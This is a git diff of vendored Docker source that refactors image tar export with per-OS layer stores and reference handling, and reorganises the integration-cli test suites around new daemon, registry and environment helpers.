[]reference.NamedTagged - layers []string + refs []reference.NamedTagged + layers []string + image *image.Image + layerRef layer.Layer } type saveSession struct { @@ -38,84 +43,147 @@ func (l *tarexporter) Save(names []string, outStream io.Writer) error { return err } + // Release all the image top layer references + defer l.releaseLayerReferences(images) return (&saveSession{tarexporter: l, images: images}).save(outStream) } -func (l *tarexporter) parseNames(names []string) (map[image.ID]*imageDescriptor, error) { +// parseNames will parse the image names to a map which contains image.ID to *imageDescriptor. +// Each imageDescriptor holds an image top layer reference named 'layerRef'. It is taken here, should be released later. +func (l *tarexporter) parseNames(names []string) (desc map[image.ID]*imageDescriptor, rErr error) { imgDescr := make(map[image.ID]*imageDescriptor) + defer func() { + if rErr != nil { + l.releaseLayerReferences(imgDescr) + } + }() - addAssoc := func(id image.ID, ref reference.Named) { + addAssoc := func(id image.ID, ref reference.Named) error { if _, ok := imgDescr[id]; !ok { - imgDescr[id] = &imageDescriptor{} + descr := &imageDescriptor{} + if err := l.takeLayerReference(id, descr); err != nil { + return err + } + imgDescr[id] = descr } if ref != nil { - var tagged reference.NamedTagged if _, ok := ref.(reference.Canonical); ok { - return + return nil } - var ok bool - if tagged, ok = ref.(reference.NamedTagged); !ok { - var err error - if tagged, err = reference.WithTag(ref, reference.DefaultTag); err != nil { - return - } + tagged, ok := reference.TagNameOnly(ref).(reference.NamedTagged) + if !ok { + return nil } for _, t := range imgDescr[id].refs { if tagged.String() == t.String() { - return + return nil } } imgDescr[id].refs = append(imgDescr[id].refs, tagged) } + return nil } for _, name := range names { - id, ref, err := reference.ParseIDOrReference(name) + ref, err := reference.ParseAnyReference(name) if err != nil { return nil, err } - if id != "" { - _, err := l.is.Get(image.IDFromDigest(id)) - if err != nil { - return nil, err + namedRef, ok := ref.(reference.Named) + if !ok { + // Check if digest ID reference + if digested, ok := ref.(reference.Digested); ok { + id := image.IDFromDigest(digested.Digest()) + if err := addAssoc(id, nil); err != nil { + return nil, err + } + continue } - addAssoc(image.IDFromDigest(id), nil) - continue + return nil, errors.Errorf("invalid reference: %v", name) } - if ref.Name() == string(digest.Canonical) { + + if reference.FamiliarName(namedRef) == string(digest.Canonical) { imgID, err := l.is.Search(name) if err != nil { return nil, err } - addAssoc(imgID, nil) + if err := addAssoc(imgID, nil); err != nil { + return nil, err + } continue } - if reference.IsNameOnly(ref) { - assocs := l.rs.ReferencesByName(ref) + if reference.IsNameOnly(namedRef) { + assocs := l.rs.ReferencesByName(namedRef) for _, assoc := range assocs { - addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref) + if err := addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref); err != nil { + return nil, err + } } if len(assocs) == 0 { imgID, err := l.is.Search(name) if err != nil { return nil, err } - addAssoc(imgID, nil) + if err := addAssoc(imgID, nil); err != nil { + return nil, err + } } continue } - id, err = l.rs.Get(ref) + id, err := l.rs.Get(namedRef) if err != nil { return nil, err } - addAssoc(image.IDFromDigest(id), ref) + if err := addAssoc(image.IDFromDigest(id), namedRef); err != nil { + return nil, err + } } return imgDescr, nil } +// takeLayerReference will take/Get the image top layer reference +func (l *tarexporter) takeLayerReference(id image.ID, imgDescr *imageDescriptor) error { + img, err := l.is.Get(id) + if err != nil { + return err + } + imgDescr.image = img + topLayerID := img.RootFS.ChainID() + if topLayerID == "" { + return nil + } + os := img.OS + if os == "" { + os = runtime.GOOS + } + if !system.IsOSSupported(os) { + return fmt.Errorf("os %q is not supported", os) + } + layer, err := l.lss[os].Get(topLayerID) + if err != nil { + return err + } + imgDescr.layerRef = layer + return nil +} + +// releaseLayerReferences will release all the image top layer references +func (l *tarexporter) releaseLayerReferences(imgDescr map[image.ID]*imageDescriptor) error { + for _, descr := range imgDescr { + if descr.layerRef != nil { + os := descr.image.OS + if os == "" { + os = runtime.GOOS + } + l.lss[os].Release(descr.layerRef) + } + } + return nil +} + func (s *saveSession) save(outStream io.Writer) error { s.savedLayers = make(map[string]struct{}) s.diffIDPaths = make(map[layer.DiffID]string) @@ -143,15 +211,20 @@ func (s *saveSession) save(outStream io.Writer) error { var layers []string for _, ref := range imageDescr.refs { - if _, ok := reposLegacy[ref.Name()]; !ok { - reposLegacy[ref.Name()] = make(map[string]string) + familiarName := reference.FamiliarName(ref) + if _, ok := reposLegacy[familiarName]; !ok { + reposLegacy[familiarName] = make(map[string]string) } - reposLegacy[ref.Name()][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1] - repoTags = append(repoTags, ref.String()) + reposLegacy[familiarName][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1] + repoTags = append(repoTags, reference.FamiliarString(ref)) } for _, l := range imageDescr.layers { - layers = append(layers, filepath.Join(l, legacyLayerFileName)) + // IMPORTANT: We use path, not filepath here to ensure the layers + // in the manifest use Unix-style forward-slashes. Otherwise, a + // Linux image saved from LCOW won't be able to be imported on + // LCOL. + layers = append(layers, path.Join(l, legacyLayerFileName)) } manifest = append(manifest, manifestItem{ @@ -214,18 +287,12 @@ func (s *saveSession) save(outStream io.Writer) error { } defer fs.Close() - if _, err := io.Copy(outStream, fs); err != nil { - return err - } - return nil + _, err = io.Copy(outStream, fs) + return err } func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Descriptor, error) { - img, err := s.is.Get(id) - if err != nil { - return nil, err - } - + img := s.images[id].image if len(img.RootFS.DiffIDs) == 0 { return nil, fmt.Errorf("empty export - not implemented") } @@ -235,7 +302,9 @@ func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Desc var foreignSrcs map[layer.DiffID]distribution.Descriptor for i := range img.RootFS.DiffIDs { v1Img := image.V1Image{ - Created: img.Created, + // This is for backward compatibility used for + // pre v1.9 docker. + Created: time.Unix(0, 0), } if i == len(img.RootFS.DiffIDs)-1 { v1Img = img.V1Image @@ -252,6 +321,7 @@ func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Desc v1Img.Parent = parent.Hex() } + v1Img.OS = img.OS src, err := s.saveLayer(rootFS.ChainID(), v1Img, img.Created) if err != nil { return nil, err @@ -304,18 +374,24 @@ func (s *saveSession) saveLayer(id layer.ChainID, legacyImg image.V1Image, creat // serialize filesystem layerPath := filepath.Join(outDir, legacyLayerFileName) - l, err := s.ls.Get(id) + operatingSystem := legacyImg.OS + if operatingSystem == "" { + operatingSystem = runtime.GOOS + } + l, err := s.lss[operatingSystem].Get(id) if err != nil { return distribution.Descriptor{}, err } - defer layer.ReleaseAndLog(s.ls, l) + defer layer.ReleaseAndLog(s.lss[operatingSystem], l) if oldPath, exists := s.diffIDPaths[l.DiffID()]; exists { relPath, err := filepath.Rel(outDir, oldPath) if err != nil { return distribution.Descriptor{}, err } - os.Symlink(relPath, layerPath) + if err := os.Symlink(relPath, layerPath); err != nil { + return distribution.Descriptor{}, errors.Wrap(err, "error creating symlink while saving layer") + } } else { // Use system.CreateSequential rather than os.Create. This ensures sequential // file access on Windows to avoid eating into MM standby list. diff --git a/vendor/github.com/docker/docker/image/tarexport/tarexport.go b/vendor/github.com/docker/docker/image/tarexport/tarexport.go index c0be95480e..beff668cd8 100644 --- a/vendor/github.com/docker/docker/image/tarexport/tarexport.go +++ b/vendor/github.com/docker/docker/image/tarexport/tarexport.go @@ -1,10 +1,10 @@ -package tarexport +package tarexport // import "github.com/docker/docker/image/tarexport" import ( "github.com/docker/distribution" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" ) const ( @@ -25,8 +25,8 @@ type manifestItem struct { type tarexporter struct { is image.Store - ls layer.Store - rs reference.Store + lss map[string]layer.Store + rs refstore.Store loggerImgEvent LogImageEvent } @@ -36,11 +36,11 @@ type LogImageEvent interface { LogImageEvent(imageID, refName, action string) } -// NewTarExporter returns new ImageExporter for tar packages -func NewTarExporter(is image.Store, ls layer.Store, rs reference.Store, loggerImgEvent LogImageEvent) image.Exporter { +// NewTarExporter returns new Exporter for tar packages +func NewTarExporter(is image.Store, lss map[string]layer.Store, rs refstore.Store, loggerImgEvent LogImageEvent) image.Exporter { return &tarexporter{ is: is, - ls: ls, + lss: lss, rs: rs, loggerImgEvent: loggerImgEvent, } diff --git a/vendor/github.com/docker/docker/image/v1/imagev1.go b/vendor/github.com/docker/docker/image/v1/imagev1.go index d498ddbc00..c341ceaa77 100644 --- a/vendor/github.com/docker/docker/image/v1/imagev1.go +++ b/vendor/github.com/docker/docker/image/v1/imagev1.go @@ -1,21 +1,18 @@ -package v1 +package v1 // import "github.com/docker/docker/image/v1" import ( "encoding/json" - "fmt" "reflect" - "regexp" "strings" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types/versions" "github.com/docker/docker/image" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) -var validHex = regexp.MustCompile(`^([a-f0-9]{64})$`) - // noFallbackMinVersion is the minimum version for which v1compatibility // information will not be marshaled through the Image struct to remove // blank fields. @@ -109,7 +106,7 @@ func MakeConfigFromV1Config(imageJSON []byte, rootfs *image.RootFS, history []im return json.Marshal(c) } -// MakeV1ConfigFromConfig creates an legacy V1 image config from an Image struct +// MakeV1ConfigFromConfig creates a legacy V1 image config from an Image struct func MakeV1ConfigFromConfig(img *image.Image, v1ID, parentV1ID string, throwaway bool) ([]byte, error) { // Top-level v1compatibility string should be a modified version of the // image config. @@ -149,8 +146,5 @@ func rawJSON(value interface{}) *json.RawMessage { // ValidateID checks whether an ID string is a valid image ID. func ValidateID(id string) error { - if ok := validHex.MatchString(id); !ok { - return fmt.Errorf("image ID %q is invalid", id) - } - return nil + return stringid.ValidateID(id) } diff --git a/vendor/github.com/docker/docker/image/v1/imagev1_test.go b/vendor/github.com/docker/docker/image/v1/imagev1_test.go index 936c55e4c5..45ae783d18 100644 --- a/vendor/github.com/docker/docker/image/v1/imagev1_test.go +++ b/vendor/github.com/docker/docker/image/v1/imagev1_test.go @@ -1,4 +1,4 @@ -package v1 +package v1 // import "github.com/docker/docker/image/v1" import ( "encoding/json" diff --git a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go index b87e131b7e..ae0f67f6b0 100644 --- a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go +++ b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go @@ -8,7 +8,7 @@ import ( "strings" "sync" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) diff --git a/vendor/github.com/docker/docker/integration-cli/check_test.go b/vendor/github.com/docker/docker/integration-cli/check_test.go index 7084d6f8af..76b17627e7 100644 --- a/vendor/github.com/docker/docker/integration-cli/check_test.go +++ b/vendor/github.com/docker/docker/integration-cli/check_test.go @@ -1,32 +1,78 @@ package main import ( + "context" "fmt" + "io/ioutil" "net/http/httptest" "os" + "path" "path/filepath" + "strconv" "sync" "syscall" "testing" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cliconfig" + "time" + + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/integration-cli/environment" + testdaemon "github.com/docker/docker/internal/test/daemon" + ienv "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/internal/test/fakestorage" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/internal/test/registry" "github.com/docker/docker/pkg/reexec" "github.com/go-check/check" ) -func Test(t *testing.T) { +const ( + // the private registry to use for tests + privateRegistryURL = registry.DefaultURL + + // path to containerd's ctr binary + ctrBinary = "docker-containerd-ctr" + + // the docker daemon binary to use + dockerdBinary = "dockerd" +) + +var ( + testEnv *environment.Execution + + // the docker client binary to use + dockerBinary = "" +) + +func init() { + var err error + reexec.Init() // This is required for external graphdriver tests - if !isLocalDaemon { - fmt.Println("INFO: Testing against a remote daemon") - } else { - fmt.Println("INFO: Testing against a local daemon") + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) } +} - if daemonPlatform == "linux" { - ensureFrozenImagesLinux(t) +func TestMain(m *testing.M) { + dockerBinary = testEnv.DockerBinary() + err := ienv.EnsureFrozenImagesLinux(&testEnv.Execution) + if err != nil { + fmt.Println(err) + os.Exit(1) } + + testEnv.Print() + os.Exit(m.Run()) +} + +func Test(t *testing.T) { + cli.SetTestEnvironment(testEnv) + fakestorage.SetTestEnvironment(&testEnv.Execution) + ienv.ProtectAll(t, &testEnv.Execution) check.TestingT(t) } @@ -38,18 +84,28 @@ type DockerSuite struct { } func (s *DockerSuite) OnTimeout(c *check.C) { - if daemonPid > 0 && isLocalDaemon { - signalDaemonDump(daemonPid) + if testEnv.IsRemoteDaemon() { + return + } + path := filepath.Join(os.Getenv("DEST"), "docker.pid") + b, err := ioutil.ReadFile(path) + if err != nil { + c.Fatalf("Failed to get daemon PID from %s\n", path) + } + + rawPid, err := strconv.ParseInt(string(b), 10, 32) + if err != nil { + c.Fatalf("Failed to parse pid from %s: %s\n", path, err) + } + + daemonPid := int(rawPid) + if daemonPid > 0 { + testdaemon.SignalDaemonDump(daemonPid) } } func (s *DockerSuite) TearDownTest(c *check.C) { - unpauseAllContainers() - deleteAllContainers() - deleteAllImages() - deleteAllVolumes() - deleteAllNetworks() - deleteAllPlugins() + testEnv.Clean(c) } func init() { @@ -60,8 +116,8 @@ func init() { type DockerRegistrySuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerRegistrySuite) OnTimeout(c *check.C) { @@ -69,9 +125,10 @@ func (s *DockerRegistrySuite) OnTimeout(c *check.C) { } func (s *DockerRegistrySuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting) - s.reg = setupRegistry(c, false, "", "") - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon) + s.reg = registry.NewV2(c) + s.reg.WaitReady(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerRegistrySuite) TearDownTest(c *check.C) { @@ -79,7 +136,7 @@ func (s *DockerRegistrySuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -92,8 +149,8 @@ func init() { type DockerSchema1RegistrySuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) { @@ -101,9 +158,10 @@ func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) { } func (s *DockerSchema1RegistrySuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64) - s.reg = setupRegistry(c, true, "", "") - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64, SameHostDaemon) + s.reg = registry.NewV2(c, registry.Schema1) + s.reg.WaitReady(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) { @@ -111,7 +169,7 @@ func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -124,8 +182,8 @@ func init() { type DockerRegistryAuthHtpasswdSuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) { @@ -133,9 +191,10 @@ func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) { } func (s *DockerRegistryAuthHtpasswdSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting) - s.reg = setupRegistry(c, false, "htpasswd", "") - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon) + s.reg = registry.NewV2(c, registry.Htpasswd) + s.reg.WaitReady(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) { @@ -145,7 +204,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -158,8 +217,8 @@ func init() { type DockerRegistryAuthTokenSuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) { @@ -167,8 +226,8 @@ func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) { } func (s *DockerRegistryAuthTokenSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting) - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) { @@ -178,7 +237,7 @@ func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -187,7 +246,8 @@ func (s *DockerRegistryAuthTokenSuite) setupRegistryWithTokenService(c *check.C, if s == nil { c.Fatal("registry suite isn't initialized") } - s.reg = setupRegistry(c, false, "token", tokenURL) + s.reg = registry.NewV2(c, registry.Token(tokenURL)) + s.reg.WaitReady(c) } func init() { @@ -198,7 +258,7 @@ func init() { type DockerDaemonSuite struct { ds *DockerSuite - d *Daemon + d *daemon.Daemon } func (s *DockerDaemonSuite) OnTimeout(c *check.C) { @@ -206,20 +266,20 @@ func (s *DockerDaemonSuite) OnTimeout(c *check.C) { } func (s *DockerDaemonSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux) - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerDaemonSuite) TearDownTest(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } func (s *DockerDaemonSuite) TearDownSuite(c *check.C) { - filepath.Walk(daemonSockRoot, func(path string, fi os.FileInfo, err error) error { + filepath.Walk(testdaemon.SockRoot, func(path string, fi os.FileInfo, err error) error { if err != nil { // ignore errors here // not cleaning up sockets is not really an error @@ -230,7 +290,7 @@ func (s *DockerDaemonSuite) TearDownSuite(c *check.C) { } return nil }) - os.RemoveAll(daemonSockRoot) + os.RemoveAll(testdaemon.SockRoot) } const defaultSwarmPort = 2477 @@ -244,7 +304,7 @@ func init() { type DockerSwarmSuite struct { server *httptest.Server ds *DockerSuite - daemons []*SwarmDaemon + daemons []*daemon.Daemon daemonsLock sync.Mutex // protect access to daemons portIndex int } @@ -258,36 +318,22 @@ func (s *DockerSwarmSuite) OnTimeout(c *check.C) { } func (s *DockerSwarmSuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) } -func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *SwarmDaemon { - d := &SwarmDaemon{ - Daemon: NewDaemon(c), - port: defaultSwarmPort + s.portIndex, - } - d.listenAddr = fmt.Sprintf("0.0.0.0:%d", d.port) - args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} // avoid networking conflicts - if experimentalDaemon { - args = append(args, "--experimental") - } - err := d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - - if joinSwarm == true { +func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *daemon.Daemon { + d := daemon.New(c, dockerBinary, dockerdBinary, + testdaemon.WithEnvironment(testEnv.Execution), + testdaemon.WithSwarmPort(defaultSwarmPort+s.portIndex), + ) + if joinSwarm { if len(s.daemons) > 0 { - tokens := s.daemons[0].joinTokens(c) - token := tokens.Worker - if manager { - token = tokens.Manager - } - c.Assert(d.Join(swarm.JoinRequest{ - RemoteAddrs: []string{s.daemons[0].listenAddr}, - JoinToken: token, - }), check.IsNil) + d.StartAndSwarmJoin(c, s.daemons[0].Daemon, manager) } else { - c.Assert(d.Init(swarm.InitRequest{}), check.IsNil) + d.StartAndSwarmInit(c) } + } else { + d.StartWithBusybox(c, "--iptables=false", "--swarm-default-advertise-addr=lo") } s.portIndex++ @@ -302,14 +348,10 @@ func (s *DockerSwarmSuite) TearDownTest(c *check.C) { testRequires(c, DaemonIsLinux) s.daemonsLock.Lock() for _, d := range s.daemons { - d.Stop() - // raft state file is quite big (64MB) so remove it after every test - walDir := filepath.Join(d.root, "swarm/raft/wal") - if err := os.RemoveAll(walDir); err != nil { - c.Logf("error removing %v: %v", walDir, err) + if d != nil { + d.Stop(c) + d.Cleanup(c) } - - cleanupExecRoot(c, d.execRoot) } s.daemons = nil s.daemonsLock.Unlock() @@ -319,65 +361,49 @@ func (s *DockerSwarmSuite) TearDownTest(c *check.C) { } func init() { - check.Suite(&DockerTrustSuite{ + check.Suite(&DockerPluginSuite{ ds: &DockerSuite{}, }) } -type DockerTrustSuite struct { - ds *DockerSuite - reg *testRegistryV2 - not *testNotary +type DockerPluginSuite struct { + ds *DockerSuite + registry *registry.V2 } -func (s *DockerTrustSuite) SetUpTest(c *check.C) { - testRequires(c, RegistryHosting, NotaryServerHosting) - s.reg = setupRegistry(c, false, "", "") - s.not = setupNotary(c) +func (ps *DockerPluginSuite) registryHost() string { + return privateRegistryURL } -func (s *DockerTrustSuite) TearDownTest(c *check.C) { - if s.reg != nil { - s.reg.Close() - } - if s.not != nil { - s.not.Close() - } - - // Remove trusted keys and metadata after test - os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - s.ds.TearDownTest(c) +func (ps *DockerPluginSuite) getPluginRepo() string { + return path.Join(ps.registryHost(), "plugin", "basic") } - -func init() { - ds := &DockerSuite{} - check.Suite(&DockerTrustedSwarmSuite{ - trustSuite: DockerTrustSuite{ - ds: ds, - }, - swarmSuite: DockerSwarmSuite{ - ds: ds, - }, - }) +func (ps *DockerPluginSuite) getPluginRepoWithTag() string { + return ps.getPluginRepo() + ":" + "latest" } -type DockerTrustedSwarmSuite struct { - swarmSuite DockerSwarmSuite - trustSuite DockerTrustSuite - reg *testRegistryV2 - not *testNotary +func (ps *DockerPluginSuite) SetUpSuite(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + ps.registry = registry.NewV2(c) + ps.registry.WaitReady(c) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + err := plugin.CreateInRegistry(ctx, ps.getPluginRepo(), nil) + c.Assert(err, checker.IsNil, check.Commentf("failed to create plugin")) } -func (s *DockerTrustedSwarmSuite) SetUpTest(c *check.C) { - s.swarmSuite.SetUpTest(c) - s.trustSuite.SetUpTest(c) +func (ps *DockerPluginSuite) TearDownSuite(c *check.C) { + if ps.registry != nil { + ps.registry.Close() + } } -func (s *DockerTrustedSwarmSuite) TearDownTest(c *check.C) { - s.trustSuite.TearDownTest(c) - s.swarmSuite.TearDownTest(c) +func (ps *DockerPluginSuite) TearDownTest(c *check.C) { + ps.ds.TearDownTest(c) } -func (s *DockerTrustedSwarmSuite) OnTimeout(c *check.C) { - s.swarmSuite.OnTimeout(c) +func (ps *DockerPluginSuite) OnTimeout(c *check.C) { + ps.ds.OnTimeout(c) } diff --git a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go b/vendor/github.com/docker/docker/integration-cli/checker/checker.go similarity index 95% rename from vendor/github.com/docker/docker/pkg/integration/checker/checker.go rename to vendor/github.com/docker/docker/integration-cli/checker/checker.go index d1b703a599..d7fdc412ba 100644 --- a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go +++ b/vendor/github.com/docker/docker/integration-cli/checker/checker.go @@ -1,5 +1,5 @@ // Package checker provides Docker specific implementations of the go-check.Checker interface. -package checker +package checker // import "github.com/docker/docker/integration-cli/checker" import ( "github.com/go-check/check" diff --git a/vendor/github.com/docker/docker/integration-cli/cli/build/build.go b/vendor/github.com/docker/docker/integration-cli/cli/build/build.go new file mode 100644 index 0000000000..0b10ea79f8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/cli/build/build.go @@ -0,0 +1,82 @@ +package build // import "github.com/docker/docker/integration-cli/cli/build" + +import ( + "io" + "strings" + + "github.com/docker/docker/internal/test/fakecontext" + "gotest.tools/icmd" +) + +type testingT interface { + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +// WithStdinContext sets the build context from the standard input with the specified reader +func WithStdinContext(closer io.ReadCloser) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, "-") + cmd.Stdin = closer + return func() { + // FIXME(vdemeester) we should not ignore the error here… + closer.Close() + } + } +} + +// WithDockerfile creates / returns a CmdOperator to set the Dockerfile for a build operation +func WithDockerfile(dockerfile string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, "-") + cmd.Stdin = strings.NewReader(dockerfile) + return nil + } +} + +// WithoutCache makes the build ignore cache +func WithoutCache(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, "--no-cache") + return nil +} + +// WithContextPath sets the build context path +func WithContextPath(path string) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Command = append(cmd.Command, path) + return nil + } +} + +// WithExternalBuildContext use the specified context as build context +func WithExternalBuildContext(ctx *fakecontext.Fake) func(*icmd.Cmd) func() { + return func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + cmd.Command = append(cmd.Command, ".") + return nil + } +} + +// WithBuildContext sets up the build context +func WithBuildContext(t testingT, contextOperators ...func(*fakecontext.Fake) error) func(*icmd.Cmd) func() { + // FIXME(vdemeester) de-duplicate that + ctx := fakecontext.New(t, "", contextOperators...) + return func(cmd *icmd.Cmd) func() { + cmd.Dir = ctx.Dir + cmd.Command = append(cmd.Command, ".") + return closeBuildContext(t, ctx) + } +} + +// WithFile adds the specified file (with content) in the build context +func WithFile(name, content string) func(*fakecontext.Fake) error { + return fakecontext.WithFile(name, content) +} + +func closeBuildContext(t testingT, ctx *fakecontext.Fake) func() { + return func() { + if err := ctx.Close(); err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/cli/cli.go b/vendor/github.com/docker/docker/integration-cli/cli/cli.go new file mode 100644 index 0000000000..bc3f3c194e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/cli/cli.go @@ -0,0 +1,226 @@ +package cli // import "github.com/docker/docker/integration-cli/cli" + +import ( + "fmt" + "io" + "strings" + "time" + + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/integration-cli/environment" + "github.com/pkg/errors" + "gotest.tools/assert" + "gotest.tools/icmd" +) + +var testEnv *environment.Execution + +// SetTestEnvironment sets a static test environment +// TODO: decouple this package from environment +func SetTestEnvironment(env *environment.Execution) { + testEnv = env +} + +// CmdOperator defines functions that can modify a command +type CmdOperator func(*icmd.Cmd) func() + +type testingT interface { + assert.TestingT + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +// DockerCmd executes the specified docker command and expect a success +func DockerCmd(t testingT, args ...string) *icmd.Result { + return Docker(Args(args...)).Assert(t, icmd.Success) +} + +// BuildCmd executes the specified docker build command and expect a success +func BuildCmd(t testingT, name string, cmdOperators ...CmdOperator) *icmd.Result { + return Docker(Build(name), cmdOperators...).Assert(t, icmd.Success) +} + +// InspectCmd executes the specified docker inspect command and expect a success +func InspectCmd(t testingT, name string, cmdOperators ...CmdOperator) *icmd.Result { + return Docker(Inspect(name), cmdOperators...).Assert(t, icmd.Success) +} + +// WaitRun will wait for the specified container to be running, maximum 5 seconds. +func WaitRun(t testingT, name string, cmdOperators ...CmdOperator) { + WaitForInspectResult(t, name, "{{.State.Running}}", "true", 5*time.Second, cmdOperators...) +} + +// WaitExited will wait for the specified container to state exit, subject +// to a maximum time limit in seconds supplied by the caller +func WaitExited(t testingT, name string, timeout time.Duration, cmdOperators ...CmdOperator) { + WaitForInspectResult(t, name, "{{.State.Status}}", "exited", timeout, cmdOperators...) +} + +// WaitRestart will wait for the specified container to restart once +func WaitRestart(t testingT, name string, timeout time.Duration, cmdOperators ...CmdOperator) { + WaitForInspectResult(t, name, "{{.RestartCount}}", "1", timeout, cmdOperators...) +} + +// WaitForInspectResult waits for the specified expression to be equals to the specified expected string in the given time. +func WaitForInspectResult(t testingT, name, expr, expected string, timeout time.Duration, cmdOperators ...CmdOperator) { + after := time.After(timeout) + + args := []string{"inspect", "-f", expr, name} + for { + result := Docker(Args(args...), cmdOperators...) + if result.Error != nil { + if !strings.Contains(strings.ToLower(result.Stderr()), "no such") { + t.Fatalf("error executing docker inspect: %v\n%s", + result.Stderr(), result.Stdout()) + } + select { + case <-after: + t.Fatal(result.Error) + default: + time.Sleep(10 * time.Millisecond) + continue + } + } + + out := strings.TrimSpace(result.Stdout()) + if out == expected { + break + } + + select { + case <-after: + t.Fatalf("condition \"%q == %q\" not true in time (%v)", out, expected, timeout) + default: + } + + time.Sleep(100 * time.Millisecond) + } +} + +// Docker executes the specified docker 